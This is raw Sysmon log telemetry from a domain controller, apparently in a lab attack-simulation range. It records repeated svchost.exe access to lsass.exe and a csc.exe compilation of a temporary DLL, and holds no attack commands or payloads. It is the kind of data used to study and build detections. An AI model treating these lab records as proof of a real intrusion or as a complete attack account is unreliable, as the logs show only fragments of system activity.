13:52:22.806{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.727{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:52:23.821{10ACEC4A-8517-5FCF-C602-000000009001}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\4njdtpfc.dll2020-12-08 13:52:23.618 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8517-5FCF-C702-000000009001}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8517-5FCF-C702-000000009001}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-8517-5FCF-C602-000000009001}34924588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8517-5FCF-C702-000000009001}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.820{10ACEC4A-8517-5FCF-C702-000000009001}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESA792.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCE5B668B1B6054D7188C99620E81C28D5.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8517-5FCF-C602-000000009001}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4njdtpfc.cmdline" 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.727{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.727{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.727{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.665{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8517-5FCF-C602-000000009001}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 